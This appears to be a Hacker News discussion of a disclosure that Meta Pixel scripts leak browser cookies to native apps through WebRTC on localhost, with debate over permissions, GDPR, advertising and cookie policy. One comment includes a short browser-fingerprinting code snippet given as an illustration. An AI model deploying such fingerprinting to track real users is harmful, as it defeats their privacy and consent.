> On or around May 17th, Meta Pixel added a new method to their script that sends the _fbp cookie using WebRTC TURN instead of STUN. The new TURN method avoids SDP Munging, which Chrome developers publicly announced to disable following our disclosure. As of June 2, 2025, we have not observed the Facebook or Instagram applications actively listening on these new ports.
> something-embarassing.com,
Depending on the country that you or your family lives in, this could be far worse than embarrassment.
Thank you! This was a powerful reminder of how important it is to be careful with our words and cover all possibilities when commenting, and additionally, holding ourselves to account for our reading. I was a bit stunned at how I just sort of...flitted through? browsed? skimmed?...well, let's put it plainly: irresponsibly claimed to myself to have read and understood this. Meanwhile, I had completely neglected to notice this goes far beyond embarrassment. It's quite damning that I entirely missed that the consequences of someone knowing someones entire browsing history aren't just mere "embarrassment": first, there are plenty of contexts where it could even lead to state activity and my eventual imprisonment. We can even show that some countries punish the family still in a given country for the perceived "sins" (shorthand, i mean violating laws / actions against power, apologies for sloppiness here) of an individual outside the country. I shold have at least thought to acknowledge that it could go beyond embarrassment - your framing may even be too polite, to readers like me, who neglected to consider this.
So main application for WebRTC is de-anonymisation of users (for example getting their local IP address). Why it is not hidden behind permission I don't understand.
The main application for WebRTC is peer to peer data transfer.
I think you can make the argument that it should be behind a permission prompt these days but it's difficult. What would the permission prompt actually say, in easy to understand layman's terms? "This web site would like to transfer data from your computer to another computer in a way that could potentially identify you"? How many users are going to be able to make an informed choice after reading that?
Let it show "Use WebRTC?".
If users don't understand, they click whatever. If the website really needs it to operate, it will explain why before requesting, just like apps do now.
Always aim for a little more knowledgeable users than you think they are.
And specifically, if you're on something-sensitive.com in a private browsing session, it would give you the choice of giving no optional permissions. That choice is better than no choice at all, especially in a world where Meta can be subpoenaed for this tracking data by actors who may be acting unconstitutionally without sufficient oversight.
That feels pretty useless. You might as well do what happens today: enable it by default and allow knowledgable power users to disable it. If it's disabled, show a message to the user explaining why it's needed.
Today there's no way to disable it; I searched through my Firefox Mobile settings. So I'd say it's for very "power" users.
And why enable it by default, why not disable by default?
Also, sibling comments say iOS is already asking for the permission, why not just copy it?
It does exist in `about:config`, which could be made into a UI setting instead: `media.peerconnection.enabled`.
On Cromite [1], a hardened Chromium fork, there is such a setting, both in the settings page and when you click on the lock icon in the address bar.
[1]: https://cromite.org
IIRC the standard mobile Firefox version no longer makes about:config available. You need to be on a Beta or Nightly build to access it.
It is still enabled, just a bit hidden: chrome://geckoview/content/config.xhtml
Why not? How is this different than, say, location access, or microphone access?
I want to be able to configure this per web site, and a permission prompt is a better interface than having an allow/deny list hidden in settings.
Because users understand what “microphone access” entails. “Use WebRTC?” means nothing to the average user.
Fair point, but "cookies" didn't mean anything to the average user either, and "cookie consent" banners are the norm now.
I think very few people would argue that cookie consent banners, in the form in which they've become the norm, are a good thing the way permission prompts for microphone access are.
Mobile apps require location permissions to use Bluetooth right now, even though that's a hard to understand situation for average people.
If a feature can be used to track people, you have to flag it off or else you are just contributing to the tech Big Brother apparatus.
Browser functionality needs a hard segmentation into disparate categories like "pages" and "apps". For example, Pages that you're merely intending to view don't need WebRTC (or really any sort of network access beyond the originating site, and even this is questionable). And you'd only give something App functionality if it was from a trustable source and the intent was to use it as general software. This would go a long way to solving the other fingerprinting security vulnerabilities, because Pages don't need to be using functionality like Canvas, USB, etc.
If it's more profitable for a page to be an app why would people make pages?
It's only "profitable" if people don't bounce at being asked to trust a random news article, or something-embarassing.com, with their personal information. Same as why native Android apps don't just ask for every single permission. People in general do care about their security, they just lack tools to effectively protect it.
When enrolling Yubikeys and similar devices, Firefox sometimes warns "This website requires extra information about your security device which might affect your privacy. Do you want to give this information? Refusing might cause the process to fail."
You can use a similar language for WebRTC.
I wouldn't understand that. Is it getting a manufacturer address to block some devices? Does it use a key to encrypt something? Which "security device"? /dev/urandom?
I see that non-technical users can be confused by too much information, but when you omit it, even knowledgeable users can't make an informed decision.
You would because there'll be context:
1- You'd be on a page where you're enrolling your YubiKey or WebAuthn device. You'd have your key at hand, or recently plugged in.
2- Your device's LED would be flashing, and you'd be pressing the button on your device.
3- The warning will pop up at that moment, asking you that question. This means the website is probably querying for something like the serial number of your key, which increases security but reduces your privacy.
With the context at hand, you'd understand that instantly, because the place you are and the thing you're doing perfectly completes the picture, and you're in control of every step during the procedure.
> probably querying for ...
Exactly. You need to infer that, it isn't stated directly.
Just like you need to guess that "Unable to connect" means connection refused, while "We can’t connect to the server at a" means the DNS request failed. Or does it mean no route to host? Network is unreachable?
I would argue that (sometimes) the user would be fine distinguishing whether they want to approve something, but can't, because both dialogs state the same wishy-washy message. Even non-technical users (might) eventually learn the proper terms, but they can't if they are only shown meaningless statements.
> Exactly. You need to infer that, it isn't stated directly.
I don't care. The site is doing something unusual. It's evident, it's enough to take a second look and think about it.
> Just like you need to guess that "Unable to connect" means...
Again, as a layman, I don't care. As a sysadmin, I don't worry, because I can look into it in three seconds flat. Also, "Unable to connect" comes with its reasons in parentheses all the time.
We should think in simple terms.
> I don't care. The site is doing something unusual. It's evident, it's enough to take a second look and think about it.
Is it enough to make an informed decision?
> Again, as a layman, I don't care.
You do care, whether you mistyped or the network is down. I agree that you probably don't care to distinguish between "network unreachable" and "no route to host" though.
> As a sysadmin
True, but that information was already there and was thrown away.
TFA lists tens of thousands of websites using WebRTC for deanonymization. How many websites using it for P2P data transfer can you list?
Any Jitsi deployment?
Let's be clear here. Meta/other sites are abusing the technology TURN/WebRTC for a purpose it was never intended for, way beyond the comfortable confines of innocent hackery, and we all know it.
That's asshole behavior, and worth naming, shaming, and ostracizing over.
> That's asshole behavior, and worth naming, shaming, and ostracizing over.
These exploits are being developed, distributed and orchestrated by Meta. The "millions of websites" are just hummus-recipe content farms using their ad SDKs, and are downstream of Zuck in every meaningful interpretation of the term.
Meta has been named and shamed for decades. Shame only works in a society where bad actors are punished by the masses of people that constitute Meta’s products. Doesn’t mean we should stop, only that it’s not enough.
More than that, talking about TURN or WebRTC is really missing the issue. If you lock everything down so that no one can do anything you wouldn't want a malicious actor to be able to do, then no one can do anything.
The real issue is, why are we putting up with having these apps on our devices? Why do we have laws that prohibit you from e.g. using a third party app from a trusted party or with published source code in order to access the Facebook service, instead of the untrustworthy official app which is evidently actual malware?
What laws are you referring to other than Terms of Service which are entirely artificial constructs whisked into existence by service/platform providers? Which will, admittedly, be as draconian and onesided as the courts will allow.
Agree on your first point at a practical level, but from a normative standpoint, it's unforgivable to cross those streams. At the point we're talking about, with a service provider desperately wanting to leak IP info for marketability applications of an underlying dataset, and using technical primitives completely unrelated to the task at hand to do it, you very clearly have the device doing something the end user doesn't want or intend. The problem is that FAANG have turned the concept of general computing on its head by making every bloody handset a playground for the programmer, with no easily grokkable interface for the user to curtail the worst behavior of technically savvy bad actors. A connection to a TURN server or use of parts of the RTC stack should tell the user they are about to engage programming intended for real-time communication when it's happening, not just once at the beginning when most users would just accept it and ignore it from then on.
Ten or so TURN-call notifications in a context where synchronous RTC isn't involved would make it obvious that something nefarious is going on, and would actually give the user insight into what is running on the phone. Something modern devs seem to be allergic to, because it would force them to confront the sketchiness of what they are implementing instead of being transparent and following the principle of least surprise.
Modern businesses, though, would crumble under such a model, because they want to hide as much about what they are doing as possible from their customer base/competitors/regulators.
> What laws are you referring to other than Terms of Service which are entirely artificial constructs whisked into existence by service/platform providers? Which will, admittedly, be as draconian and onesided as the courts will allow.
There are two main ones.
The first is the CFAA, which by its terms would turn those ToS violations into a serious felony, if violations of the ToS means your access is "unauthorized". Courts have been variously skeptical of that interpretation because of its obvious absurdity, but when it's megacorp vs. small business or open source project, you're often not even getting into court because the party trying to interoperate immediately folds. Especially when the penalties are that scary. It's also a worthless piece of legislation because the actual bad things people do after actual unauthorized access are all separately illegal, so the penalty for unauthorized access by itself should be no more than a minor misdemeanor, and then it makes no sense as a federal law because that sort of thing isn't worth a federal prosecutor's time. Which implies we should just get rid of it.
The other one, and this one gets you twice, is DMCA 1201. It's nominally about circumventing DRM but its actual purpose is that Hollywood wants to monopolize the playback devices, which is exactly the thing we're talking about. Someone wants to make an app where you can watch videos on any streaming service you subscribe to and make recommendations (but the recommendations might be to content on YouTube or another non-Hollywood service), or block ads etc. The content providers use the law to prevent this by sticking some DRM on the stream to make it illegal for a third party app to decrypt it. Facebook can do the same thing by claiming that other users' posts are "copyrighted works".
And then the same law is used by the phone platforms to lock users out of competing platforms and app stores. You want to make your competing phone platform and have it run existing Android apps, or use microG instead of Google Play, but now Netflix is broken and so is your bank app so normal people won't put up with that and the competition is thwarted. Then Facebook goes to the now-monopoly Google Play Store and has "unauthorized" third party Facebook readers removed.
These things should be illegal the other way around. Adversarial interoperability should be a right and thwarting it should be a crime, i.e. an antitrust violation.
> The problem is that FAANG have turned the concept of general computing on its head by making every bloody handset a playground for the programmer, with no easily grokkable interface for the user to curtail the worst behavior of technically savvy bad actors.
But how do you suppose that happened? Why isn't there a popular Android fork which runs all the same apps but provides a better permissions model or greater visibility into what apps are doing?
Fair. I see your angle now. 100% with you.
>Why isn't there a popular Android fork which runs all the same apps but provides a better permissions model or greater visibility into what apps are doing?
Besides every possible attempt being DOA because Google is intent on monopolizing the space with their TOS and OEM terms? There isn't a fork because it can't be Android if you do that sort of thing, and if you tried it'd be you vs. Google. Never mind the bloody rat's nest of intentionally one-sided architecture decisions made to ensure the modern smartphone is first and foremost a consumption device instead of a usable and configurable tool, which includes things like regulations around the baseband processor, lawful interception/MITM capability, and meddling, as you mentioned, in the name of DMCA 1201.
Though there's an even more subtle reason why, too: the lack of accessible system developer documentation, the inability to write custom firmware, and missing architecture documentation. It's all NDA-locked IP, and completely blobbed.
The will is there amongst people to support things, but the legal power edifice has constructed intentional info asymmetries in order to keep the majority of the population under some semblance of controlled behavior through the shaping of the legal landscape and incentive structures.
> The will is there amongst people to support things, but the legal power edifice has constructed intentional info asymmetries in order to keep the majority of the population under some semblance of controlled behavior through the shaping of the legal landscape and incentive structures.
Exactly. We have bad laws and therefore bad outcomes. To get better outcomes we need better laws.
What about "This website would like to connect to the Instagram App and may share your browsing history and other personal details."
Why should that message show up when I'm trying to make a video call in my browser? I'm just trying to call my nephew.
There are already permissions dialogs for using the camera/microphone. I don't think it'd be absurd to implicitly grant WebRTC permissions alongside that.
The website wants to connect to another computer|another app on your computer.
Most users probably will click "No" and this is a good choice.
>The website wants to connect to another computer|another app on your computer.
"website wants to connect to another computer" basically describes all websites. Do you really expect the average user to understand the difference? The exploit is also non-trivial either. SDP and TURN aren't privacy risks in and of themselves. They only pose risks when the server is set to localhost and with a cooperating app.
Pardon my ignorance, but modern browsers won't even load assets or iframes over plain HTTP within an SSL page. So under normal circumstances you cannot open so much as an iframe to "localhost" from an https URL unless you've configured HTTPS locally, regardless of cross-domain perms. Wouldn't you want to require a special security permission from an app that was trying to set up a local server, AND require confirmation from a browser that was trying to connect to a local server?
HTTP isn't allowed on secure pages because the security of HTTP is known to be non-existent. WebRTC uses datagram TLS, which is approximately on par with HTTPS.
The thing that's happening here isn't really a problem with WebRTC. Compare this to having an app on your phone that listens on an arbitrary port and spits out a unique tracking ID to anything that connects. Does it matter if the connection is made using HTTP or HTTPS or WebRTC or something else? Not really. The actual problem is that you installed malware on your phone.
But that says nothing about the danger of identifying you.
> Most users probably will click "No"
Strong disagree. When I'm loading google.com is my computer not connecting to another computer? From a layman's perspective this is the basis of the internet doing what it does. Not to mention, the vast majority of users say yes to pretty much any permission prompt you put in front of them.
> The main application for WebRTC is peer to peer data transfer.
But not for the user.
The existing killer app for WebRTC is video chat without installing an app, which is huge.
Other P2P uses are very cool and interesting as well - abusing it for fingerprinting is just that, abusing a user-positive feature and twisting it for identification, just like a million other browser features.
You mean just like a million other "user-positive" browser features pushed by the biggest tracking company there is.
The technique doesn't actually rely on WebRTC though, does it? Not showing up in the default view of Chrome's network inspector obfuscates it a bit, but it's not like there aren't other ways to do what they're achieving here.
Because the decision makers don't care about privacy, they only want you to think that you have privacy, thus enabling even more spying. One solution is to not use the apps and websites from companies that are known to abuse WebRTC or something else.
This is not unique to WebRTC. The same result could be achieved by sending an HTTP request to localhost. The only difference in this case is that using WebRTC doesn't log an HTTP request.
The browser could refuse to connect to localhost. I think there are browsers that refuse (e.g. to prevent attacks on a router config interface).
I doubt anyone is running a browser on their router.
But still, you could do the same for stun, turn, sdp. Disallow local host.
That's literally what browsers have done (for STUN) and are working on (for TURN).
> 1. User logged into FB or IG app. The app runs in background, and listens for incoming traffic on specific ports.
I happen to be immune: I disabled Background App Refresh in iOS settings. All app notifications still work, except WhatsApp :(
https://forums.macrumors.com/threads/any-reason-to-use-backg...
> except whatsapp
> company checks out
Not totally following but it sounds like you are saying one of the things they have been doing involves abusing mandated GDPR cookie notices to secretly track people?
Yes? The cookie in question is first-party, which means you’ve consented to permitting only that party to track you using it, and not to its use for wider behavioral tracking across websites.
However, the locally hosted FB/Yandex listener receives all of these first-party cookies, from all parties, and the OP's implication is (I think) that these first-party cookies, which consent says should not be correlatable, can be or are being used to track you across all sites that use them.
Not only did you only consent to the one party using it, but the browser has robust protections in place to ensure that these cookies are only usable by that party. This “hack” gets around the restriction completely, leveraging a local service to aggregate all the cookies across sites.
This is why schemes involving cookies as the permission mechanism were really poison pills. As long as there is a cookie to be tracked, any at all, you have the data exfil/tracking problem. The only thing that changes is where the aggregation happens.
IANAL, but it's not GDPR-conformant consent in any way. Consent needs to be informed, unambiguous, and freely given to be valid and should be easy to reject. The only way for this to be valid would be a consent form with something like:
Allow Meta tracking to connect the Facebook or Instagram app on your device to associate visits to this website with your Meta account. Yes/No (With No selected as a default.)
I am pretty sure that this is a grave violation of the GDPR.
That's probably already part of the consent form websites pop up listing 200 different trackers. If you permit data sharing with Facebook/IG/Meta in the consent form, you're consenting to tracking in general, not just cookie-based tracking.
"No" doesn't even need to be selected as a default, as long as you don't use dark patterns. Making the user manually click yes or no is perfectly valid (as long as you don't make "yes" easier than "no", so if you add an "allow all" button there should be an equally prominent "deny all" button).
Which, on the face of it, sounds like a violation of the GDPR...
The intent of these laws is just so obtuse and unclear! And beyond that complying is technically impossible to implement but you could only understand that if you were a rocket scientist PhD computer science wizkid making $$$$k in California which isn't that much in such a high cost of living area donchaknow. /sardonic
>abusing mandated GDPR cookie notices to secretly track people?
How does that even work? What can GDPR cookie notices do that the typical tracker can't?
The cookie preference pop-up is itself backed by a cookie: to track your preference, they need a cookie. We legally mandated a cookie. They're using the cookie regardless. But no one will call them on it until a critical mass is reached to get cases in a sufficiently large number of jurisdictions to curtail the behavior.
A reminder that it's possible to use tools like XPL-EX to circumvent those attempts. Also, ad blocking via AdAway would do the trick here, I assume, as it should block Meta Pixel tracking. Overall, an awful approach.
> User logged into FB or IG app. The app runs in background
So a takeaway is to avoid having Facebook or Instagram apps on your phone. I'm happy to continue to not have them.
Any others? e.g. WhatsApp. Sadly, I find this one a necessary communication tool for family and business in certain countries.
I wish we could just ban advertising and tracking on the internet. I feel like so much crap these days has come out of it, all so that CEOs can afford an extra yacht
It's already enough to just have plain ads. Like we have them on the street, at the bus station, in newspapers, etc. No tracking needed at all, just put out the message. If you need targeting, do it via the context of the place or content the ad is shown with. You don't need to know anything about the user seeing the ad. Targeting by user doesn't work anyway.
> Targeting by user doesn't work anyway.
How did you reach this conclusion? The main problem is that it works way better than traditional marketing medium.
It's the reason Google and Facebook are so massive, why would publishers choose to pay them if it doesn't work?
I've seen it being used.
Like on the frontend side with Facebook, which thinks that if I'm interested in cycling I will also be interested in cars (both are on the street, right?), or that if I'm into somewhat dirty humor I also want to see more "naughty" stuff.
And also on the backend side, used by magazines - and they mostly don't use the user profiles, because they're too targeted and don't have enough audience. And if you make the targeting broad enough, you'll again have people interested in chocolate being targeted with wine and whiskey.
Or even better, on Amazon, where you can buy a new TV and once you have done so it will suggest even more TVs to you for the next few months.
> why would publishers choose to pay them if it doesn't work?
Because they believe it works and it's impossible to prove otherwise?
By the same logic cigarettes are presumptively beneficial...
https://www.youtube.com/watch?v=ESoYS9SZW-4
Depending on the data you collect, targeting by user - unfortunately - works. If the granularity is not one user, it will be a hundred. If not, a thousand, and so on. I've seen apps run ads targeting a total of 5 cohorts (together holding a hundred million users), and I've seen companies run ads targeting 100s of cohorts with the same number of users. They all work better than no targeting at all.
However, what you're saying isn't completely wrong. I've also seen user targeting become a self-fulfilling prophecy. What happens is that it's championed by a high-level executive as the panacea for improving revenue, implemented, and seen to not work. Now, as we all know, the C*O is Always Correct, so everything else around it is modified until the user-level targeting A/B test shows positive results. Usually this ends with the product being tortured into an unusable mess.
Before you target 5 different cohorts, it's better to target the context where the ad is shown. I.e., web content normally already has a category, and people reading an article about cheap flats in a city might be very much interested in renting or buying a flat. By collecting signals on a user, you might only pick up that interest after a longer time, if you even have a profile, and by the time you pick it up they might have a new flat and no longer be interested.
Yes definitely. User level targeting comes after targeting particular ad spaces in some ad platforms. But it still adds enough marginally to be useful.
I don't think it has to go that far. I think there's a middle ground here that people would accept: show us ads, but make it a one-way firehose, like TV and billboards. If you need to advertise to pay for the site, put up all the banners you want. But don't try to single me out for a specific one.
If it could pay for network TV there's no reason it can't pay for a website.
(You could still do audience-level tracking, e.g. "Facebook and NCIS are both for old people, so advertise cruises and geriatric health services on those properties.")
Reddit has fairly extensive device fingerprinting. And they are selling data for training AI models. It's only a matter of time before there is some premium phone app that monetizes data that otherwise isn't available/for sale.
This type of thing is pure greed, completely distinct from the highly aggressive pursuit of far more lucrative opportunities that average businessmen have been able to accomplish in the extreme interest of their shareholders.
The true leaders are the traditional examples who have shown success over the centuries without letting any greed whatsoever become a dominant force, recognizing and moving in the opposite direction from those driven by overblown self-interest, who naturally have little else to offer. It can be really disgraceful these days, but people don't seem to care any more.
That's one thing that made them average businessmen though.
Now if you're below-average I understand, but most companies' shareholders would be better off with a non-greedy CEO, who outperforms by steering away from underhanded low-class behavior instead.
Now if greed is the only thing on the table, and somebody like a CEO or decision-making executive hammers away using his only little tool with admirable perseverance long enough, it does seem to have a likelihood of bringing in money that would not have otherwise come in.
This can be leveraged too, by sometimes even greedier forces.
All you can do is laugh, those shareholders might be satisfied, but just imagine what an average person could do with that kind of resources. It would put the greedy cretins to shame on their own terms.
And if you could find an honest above-average CEO, woo hoo !
The majority of internet users are either unwilling or unable to pay for content, and so far advertising has been the best business model to allow these users to access content without paying. Do you have a better suggestion?
They are able, because in the end advertising is also paid for by customers. The complications are:
- Paying for services is very visible, whereas the payment for advertising is so indirect that you do not feel like you are paying for it.
- The payments for advertising are not uniformly distributed; people with more disposable income most likely pay for more of overall advertising. But subscriptions cannot make distinctions between income levels.
- People with disposable income are typically the most willing to pay for services. However, they are also the most interesting to advertisers. For this reason, payment in place of ads is often not an option at all, because it is not attractive to websites/services.
I think banning advertising would be good. But I think a first step towards that would be completely banning tracking. That would make advertisements less effective (and consequently less valuable) and would push services to look for other streams of income. Plus it would solve the privacy issue of advertising.
This!
It's a game. When a merchant signs up to an ad platform (or when the platform is in need of volume), they are given good ROI, and the merchant plays along and treats it as "marketing expenditure". Eventually the ROI dries up, i.e. the marketing has saturated, and the merchant starts counting it as a cost and passes it onto the customer. I don't know if this is actually done, but it's also trivial for an ad platform to force merchants to continue ads by making them feel it's important: when they reduce their ad volume, just boost the ROI and visibility for their competitors (a competitor can be detected purely by shared ad space, no need to do any separate tagging). Heck, this is probably what whatever optimization algorithm they are running will end up suggesting, as it's a local minimum in feature space.
And yes, instead of banning ads, which would be too wide a legal net to be feasible, banning tracking is better. However, even this is complicated. For example, N websites can have legitimate uses for N browser features, but it turns out any M of those N features can be used to uniquely identify you. Oops. What can you even do about that, legally speaking? Don't say permissions; most people I know just click "allow" on all of them.
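To make the M-of-N point concrete, here is a minimal TypeScript sketch of how a handful of individually harmless browser features combine into a stable identifier; the feature set is illustrative, not any particular tracker's:

    // Each value below is available without any permission prompt.
    async function fingerprint(): Promise<string> {
      const signals = [
        navigator.language,
        navigator.hardwareConcurrency,
        `${screen.width}x${screen.height}@${window.devicePixelRatio}`,
        Intl.DateTimeFormat().resolvedOptions().timeZone,
        navigator.maxTouchPoints,
      ].join("|");
      // Hash so the tracker stores an opaque ID rather than raw values.
      const digest = await crypto.subtle.digest(
        "SHA-256",
        new TextEncoder().encode(signals)
      );
      return Array.from(new Uint8Array(digest))
        .map((b) => b.toString(16).padStart(2, "0"))
        .join("");
    }

Each signal alone is coarse, but the combination is often unique enough across a site's visitors, and blocking any one of them barely helps.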
Internet users pay for their services by everything they buy being more expensive due to the producers having to cover the advertising expenses.
I think that might be a rhetorical device bequeathed to you by the social media companies.
People of course do pay for things all the time. It’s just the social media folks found a way to make a lot more money than people would otherwise pay, through advertising. And in this situation, through illegal advertising.
The best thing we can all do is refuse to work for Meta. If good engineers did that, there would be no Meta. Problem solved. But it seems many engineers prefer it this way.
Sure, this entire business model has been cataclysmic for traditional media organizations and news outlets, and people's trust in institutions has plummeted in correlation, so let's just fucking scrap it and go back to paid media.
"Traditional media organizations" have been primarily funded by advertising longer than anyone on HN has been alive.
Some of them; perhaps even a vast majority. But this isn't the only option nor do we have to continue for it to be so.
Manufacturing Consent identified advertising as one of its five filters, and it was published in 1988. It is and was extremely rare for a magazine or newspaper to not be at least partially funded by advertisements.
I don't pay for network TV but it still gets produced
And it is funded by ads, what's your point?
Those ads don't track me
https://en.m.wikipedia.org/wiki/ATSC_3.0#Privacy
And if they eventually get rid of the legacy requirement I'll complain
>The majority of internet users are either unwilling or unable to pay for content
Except for Spotify, news subscriptions, videogame subscriptions, video streaming services, Duolingo, donations, GoFundMes, piracy services(!), clothing and food subscriptions, etc. etc.
People pay $10 for a new fortnite skin. You really pretending they won't pay for content?
People were willing to pay for stuff on the internet even when you could only do so by calling someone up and reading off your credit card number and just trusting a stranger.
Meanwhile, the norm until cable television for "free" things like news was that you either paid, or you went to the library to read it for free.
Maybe people could visit libraries more again.
The question is how do you ban it, and then how do you prove that people are breaking those rules?
By defining the $thing, banning the $thing per that definition by law, and then tasking an FBI-like organization with enforcing the law? It won't completely go away, but it will subside, like how gambling on the Internet has been split in two and confined to lootbox games without cash-out features on one side and straight-up scam underground casinos on the other.
Personally I think we should start by separating good old ads (the kind that existed before I was 15) from Internet "ads". The old ads were still somewhat heavily targeted, but less than they are now. There is probably an agreeable line up to which advertising efforts can be perverted.
I mean the comparison of ‘old’ ads vs new ads is interesting in itself, old ads already abide by far more regulation and are far more auditable. Simply bringing digital ads in line would be a big step forward.
Some examples:
In most countries it’s illegal to ‘target minors’ and there’s restrictions on what ads can run on after school hours. Meta has always allowed age targeting down to 13 and has no time of day restrictions.
In parts of New Zealand you can’t advertise alcohol between 10PM and 9AM… unless you do it on Meta or Google.
Most countries have regulation about promoting casinos (or ban it outright), unless they’re digital casinos being promoted in digital ads.
Or just look at the deepfake finance and crypto ads that run on Meta and X. Meta requires 24 strikes against an advertiser before they pull them down, if a TV network ran just one ad like that it would be a scandal.
Auditability is the biggest issue imo. If a TV ad runs, we can all see it at the same time and know it ran. That is simply impossible with digital ads, and even when Meta releases some tools for auditing, the caveat is that you still have to trust what they’re releasing. Similarly with data protection: there’s no way to truly audit what they’re doing unless you install government agencies in the companies to provide oversight, and I don’t see how you could really make that work.
It would be nice if they also couldn't target us with more information than what we consent to give them. Like, fine, if you want to target facebook ads at people using details they've filled in, I can see that being acceptable, but trying to scrape every single byte of data about us and using that to throw targeted ads at us feels icky.
Better moderation of crappy AI-generated image ads that are just scamming you would be nice as well.
Yes - although I disagree on one point.
All we need to do is define the $thing and mandate that lawsuits can be effective.
No agency enforces that potato chips need to fill up 92% of the bag or whatever, or that McDonalds cannot show pictures of apple fritters with more apples than they actually come with (this happened).
You just incentivize a cottage industry of lawyers who can squeeze a profit out of suing peanut butter companies for incorrect labelling, or for advertising dishonestly, and it sort of takes care of itself.
I think the main problem is that lots of money is made from it, and money influences politics hugely. The technical difficulties are low on the list of reasons this is not happening.
https://news.ycombinator.com/item?id=43595269
I like the idea, but where do you draw the line on what advertising is.
Is affiliate marketing still allowed? Are influencers allowed to take payment? Can people be a spokesperson for a company? Can newspapers run commentary about businesses? Can companies pay to be vendors at a conference?
No matter where you end up drawing the line you’re just shifting the problems somewhere else. Look at the amount of money Meta and Google make, the incentive is just too large.
I know. It's wishful thinking that will never become a reality. I pray for a solarpunk future in the same way
It's impossible and we all know it. Instead, donate or help with the huge adblock lists that are being maintained by a lot of people
A lot of things I would have previously said were impossible have happened in the last half year. If only a few of those things were of the impossibly good type.
As said in a reply to a sibling comment, I am very aware. This is wishful thinking
>all so that CEOs can afford an extra yacht
...and so consumers can use services/products without having to fork over money.
People love the ad-model. Given the option to pay or use the "ad-supported" option, the ad-supported one wins 10 to 1. This means in many cases it doesn't even make sense to have a paid option, because the ad option is just so much more popular.
As bad as crypto is, with all the negative things attached to it, BAT was probably one of the smartest things to be invented: a browser token that automatically dispenses micropayments to websites you visit. Forget all the details one could get snagged on; the basic premise is solid: pay for what you use. You become the customer, not the advertisers.
Also a note about ad-blocking - it only makes the problem worse. It is not a "stick it to the man" protest. You protest things by boycotting them, or paying their competitors, not by using them without compensating them.
There is no such thing as a free lunch. Consumers on average are forking over the money. Otherwise no one would pay for advertising. And they are paying more than they would have otherwise since this dystopian tracking apparatus isn't free either.
Yes, we need ads for a free internet, today. And, as a result, we also have our privacy eroded - eroded in ways we may not care about today, but will probably regret tomorrow.
If we must pay for the internet, give me an option to pay to use it where I see no ads and my privacy is preserved. Let me know what that cost is and I'll decide what I want to do.
Right now, the actual pricing is obscured so we just "accept" that the internet in its current form is how it needs to be.
>give me an option to pay
This will depress ad revenue as the people with the most money will be the people who pay to remove ads. This will make less sites and content viable.
Ok?
Not every site needs to reach 1 billion people.
Plus Wikipedia seems to be doing ok occasionally asking for donations.
I really liked the concept of BAT but the reality left me wanting.
Things like "we'll hang on to the tokens of sites that don't use BAT yet for them until they join" gave negative vibes.
It all felt a little underbaked. I swing back to Brave once in a blue moon and then remember I've got at least $20's worth of BAT lost forever somewhere.
I'm not a big fan of it or anything, it's just the only crypto I know that was targeting that idea.
I'd love if there was another one that was totally open and just a browser extension away. But I do not think it would ever get off the ground because...
People love the ad model and hate paying for things.
The deprecation of third-party cookies, that all browsers were at one point on track to implement, was pretty much the most realistic first step to that. Which is why Google killed it last year by leveraging their control over Chrome.
While not technically a crime, it was a disgusting, unethical market manipulation move that never really got the public outrage it deserved.
Google execs’ initial support for it was also telling: leadership at Google must literally have thought they would find another way to stay as profitable as they are without third-party cookies. Put another way: Google leadership didn’t understand cookies as well as someone who’s taken a single undergrad web dev class. (Or they were lying all along, and always planned to “renege” on third-party cookie deprecation.)
I don't think that's quite what happened. Google got in anti-trust trouble because they have an unfair advantage in user-tracking, given logged in Chrome accounts. Removing third-party cookies hurts other privacy-invading companies without substantially affecting Google. It was still somewhat on track to be removed from Chrome until they lost their antitrust battle, and Chrome was required to be spun off. With Chrome's new future, and Google's new legal constraints, there's less incentive to try and make Privacy Sandbox work. At least, that was my understanding; I didn't follow it all that closely.
This is very misleading. Google was prevented from disabling third-party cookies due to intervention by the CMA, who felt it would provide an unfair advantage over other advertisers. Google argued their case for years, proposed competing standards to act as a replacement (see Topics API), and eventually gave up on the endeavour altogether and simply made it a user toggle.
Google gets no competitive advantage from removing third party cookies from chrome. The anticompetitive monopolistic tactic was the plan to replace third party cookies with FLoC/Privacy Sandbox/Topics AI, and THAT is what they were not prevented from doing.
No one is trying to stop google from removing third party cookies. Google is just unwilling to remove them without introducing a new anticompetitive tracking tool to replace them.
> No one is trying to stop google from removing third party cookies.
That's simply not true. As I already mentioned, the CMA presented a legal challenge which you can read about online. Please review the history, as it's been going on for years now.
https://www.gov.uk/government/news/cma-to-have-key-oversight...
https://www.marketing-beat.co.uk/2024/02/06/cma-cookies-goog...
The first link confirms exactly what I said above. They’re not preventing Google from removing third party cookies, they’re preventing Google from implementing ALTERNATIVES to third party cookies. The only reason Google is unwilling to straight up remove third party cookies is their business model.
The second link does contain the phrase “cannot proceed with third-party cookie deprecation”, but it’s simply obvious that it’s not about third party cookies per se. It’s all about Google’s (unnecessary, anticompetitive, anti-user, anti-privacy) replacements for third party cookies.
It is true that the CMA is concerned with the new API proposals within the Privacy Sandbox such as Topics. However, this is from an anti-competitive angle, rather than privacy. Their goal is to ensure market fairness.
As part of that same process, they have put considerable friction in place for removing third-party cookies. They've deemed that the removal of third-party cookies could give Google an unfair market advantage, and that is why they're concerned with finding an alternative solution to replace them. This has been a very slow process, and involves many discussions and debates with regulators. That has had significant influence on the design of the Topics API.
To provide a more direct example, the CMA have also put specific stalls into the deprecation process, such as the standstill period invoked last year:
> The CMA will start a formal review of Google’s plan to deprecate cookies and Chrome’s Privacy Sandbox replacements once Google triggers a 60-day standstill period, likely at the beginning of the third quarter. During this standstill, the tech giant is forbidden to put in motion any deprecation procedures on Chrome. ... If they can’t reach an agreement, the 60-day standstill period will become 120 days.
https://www.adweek.com/programmatic/the-cma-is-prepared-to-d...
To put it simply, third-party cookies would have been dead and buried long ago if this dispute were not happening. It may be possible for Google to remove third-party cookies without a replacement, but they'd be risking a significant lawsuit and contravention of UK authority by doing so.
Insidiously calling it "Privacy Sandbox", and now setting everything to opt-in every time I log in to Chrome, is really not Googly.
Most commenters on Hacker News hated Google’s plan and hoped it would fail. Were they wrong?
It seems like damned-if-you-do, damned-if-you-don’t.
That stemmed from “dammit Google now every SaaS developer has to work nights to meet your arbitrary deadline”; here we’re caring more about the impact as consumers. It’s ok to think about things in two ways.
source: a developer who actually did have to do this (and did it, and now didn’t have to, but it’s done)
Didn't have to? Don't you need to support users on Firefox and Safari?
Actual report: https://localmess.github.io/
>Google says it's investigating the abuse
That's a bit ironic, considering how they're using any side channel they could lay their hands on (e.g. Wi-Fi AP names) to track everyone. Basically every large app vendor with multiple apps does something similar to circumvent OS restrictions as well.
If it were a small company, it'd have been delisted from Google's Play Store in an instant.
